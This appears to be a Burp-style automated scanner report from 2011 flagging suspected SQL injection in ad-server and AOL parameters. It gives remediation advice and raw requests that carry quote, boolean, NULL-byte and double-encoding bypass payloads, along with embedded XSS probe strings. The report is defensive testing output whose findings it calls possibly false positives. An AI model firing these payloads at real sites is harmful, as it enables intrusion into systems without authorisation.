SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The fu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00'&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 23:05:39 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 14517
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime ...[SNIP]... c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00''&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 23:05:40 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 11429
The url parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the url parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d1--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 22:43:12 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 5053
GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d2--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 22:43:13 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 5032
1.3. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10145548'%20or%201%3d1--%20 and 10145548'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d1--%20=1 HTTP/1.1 Host: latino.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
</script> </div> <div id="nav"><div id="navW" class="M"> <div class="dir"> <div id="dirhd"> <ul id="dhL2"> <li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li> </ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div> <div id="dircnt"> <ul id="om_dir_col1_" class="serv c noic"></ul> <ul id="om_dir_col1_" class="serv c0 noic"> <li><a id="d1" title="IM friends right from your browser -no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>
<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>
<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope ...[SNIP]...
Request 2
GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d2--%20=1 HTTP/1.1 Host: latino.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
</script> </div> <div id="nav"><div id="navW" class="M"> <div class="dir"> <div id="dirhd"> <ul id="dhL2"> <li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li> </ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div> <div id="dircnt"> <ul id="om_dir_col1_" class="serv c noic"></ul> <ul id="om_dir_col1_" class="serv c0 noic"> <li><a id="d1" title="IM friends right from your browser -..no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>
<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>
<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope ...[SNIP]...
The cb parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cb parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00'&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:28 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIBohB5z2pknKpk7dMBnVZJ1DBBLfD22Pt+xU2PMB6YwzEpG+32MdrC/bifzPdADvQXT5iL0Ejk4SoBE/RbcgLQI0z29hms4++5c518R/zUMKkBDANZDDcfeSSJsmKZKYF4g+e5/vR3s5vQQ7KmJYRZ2Ke5I7+Px/Q1DWIeAxjVePvZA3qEWPWNA4pW0y2sicSGc+OlVoHYO+iW+etQJWO903qBRjyUMB0CsnUiLCSK7ynCeU5y8vPgJO/l5QmFEhQcxYvOtJH0zTOq/DdkOdd/SL0ajHQz1t4DCzkykwGq4Aw7x+tPgkAhoQGPt9IleOihg6gLkHmyjN8bS0MOCuU93O5YHhVCLopbJlVmacuwMv8bCtG3aUjz7yVRP2bGb25zrFQSIASGHiNo65FqRryWti1di9zr7c4KSwyrOw==.dJDZXe3hTuyZrPKKuugNLQ.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19714
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=pc-test.com,gofreemanuals.com,ebay.c ...[SNIP]... KCpxo9ichxH8ldyrWDOlTDIX0nEp9dmoIMEEUHcDE0aWSuqd0ezjPzLg2vwq7QhRJ6IBfF5G6sqRQsBqlrfmecBnceMPA%2FNVxpMVm55EolFY76tnNe82&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00''&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:28 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXWckqgQj0XDDSYJM4fZ/UN5/pNoUWjY2UStRAsZ8z+UER5ssfI1MfMTt/HEA+fUJ+mJOUAA27n1jL4aNT6t45eInqrtq/te5yFu/4TgWJgPF3lanaA/WQL0hGR4YNn40OphE1cqtxFAiYkM1oYqHQjxQc7aTwAKpHz+B9MDKPLyrxntwh3/i2mJX5Nc/Q90Zv2UrsgXZTlZb8We5HR60n1BuMzOoS0f2BaCmBktIv0KuD7JiPQ8vvPW3a/RSzF+w+ieyhBpSZyayzNgFIk3CxJ1Er4t1IIZN5fMORUpiILRivZqer79VNpU3Z7/GIz5YXjdAKpV/kZh2ArN9FGGu9PQbNss3p1F+wvGCxJwowXASlEVIlb3eIZsCuDbU6YuQ8/JIpoTrl77tvTTezvSiw3n4w6Ya.XCrCvBdO0LVqEPsFqbfYvA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 20057
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,gofreemanuals. ...[SNIP]...
The cl_site_link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cl_site_link parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cl_site_link request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:03:04 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/Sk5qAFuhB59X9RSPW7cuX5BjLSsC03SVEk82l5MNAgAnNo673eS84tAp+za0YwsMeVekfsK3TP/Q67SgdYA8R1yGFrOkUNg1YOW6xDpzwv0dIL7C1mtDBX5no1JyUMKe8U3R9rTsUHae6xXoN/s0UNSnTBaZ8fZflGHPQmUQxQUYIEHm6oTR8fvN3CXOlCU2UpUdtl27oFWaqtfb6hy/xbC9QJl10w3q4RBKj7+JgNtLTCNbQ8+PfOMxQTyn2+gtbV0Ex4pGqbu1+Su95/0Ux9LNQV3gAFKht8/dyPjYc1vXOdQM6f5RSsm2cAFg3w0MGJlUU0EnLblOfvdGvlyXWW3hOx3nmBQihS4AY7cPIByNTm+gmRP1z8LiMIj/Z61MsOvK5N4ha7ILE2hEdAzL9PG/IC4gLURn3j6xkza3w5TxLbEs7PEwgix1WJMMCz+ss753/VNwoZ7mUR7Hd7+MXThNjF7bUSSjs4R8MVkEdSyLgXeXdIl8Uwk61wqQ==.4gWHTv/7aOocs7YpvOTMrA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19038
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,homewarran ...[SNIP]... gYZKPBN4JCKZoLQG8l5d70OEnJGhuQplXG%2FzRyTwAzRaGBLVM9lQz5Zr%2B4E92M6fWD2ZHc5UnKJZ8o%2BDEbw1CFsq%2B6QBonqYdQ0FLncw%3D%3D&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:03:04 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/Sk5qAFuhB59X9RSPW7cuX5BjLSsC03SVEk82l5MNAgAnNo673eS84tAp+za0YwsMeVekfsK3TP/Q67SgdYA8R1yGFrOkUNg1YOW6xDpzwv0dIL7C1mtDBX5no1JyUMKe8U3R9rTsUHae6xXoN/s0UNSnTBaZ8fZflGHPQmUQxQUYIEHm6oTR8fvN3CXOlCU2UpUdtl27oFWaqtfb6hy/xbC9QJl10w3q4RBKj7+JgNtLTCNbQ8+PfOMxQTyn2+gtbV0Ex4pGqbu1+Su95/0Ux9LNQV3gAFKht8/dyPjYc1vXOdQM6f5RSsm2cAFg3w0MGJlUU0EnLblOfvdGvlyXWW3hOx3nmBQihS4AY7cPIByNTm+gmRP1z8LiMIj/Z61MsOvK5N4ha7ILE2hEdAzL9PG/IC4gLURn3j6xkza3w5TxLbEs7PEwgix1WJMMCz+ss753/VNwoZ7mUR7Hd7+MXThNjF7bUSSjs4R8MVkEdSyLgXeXdIl8Uwk61wqQ==.4gWHTv/7aOocs7YpvOTMrA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 18984
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c ...[SNIP]...
The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
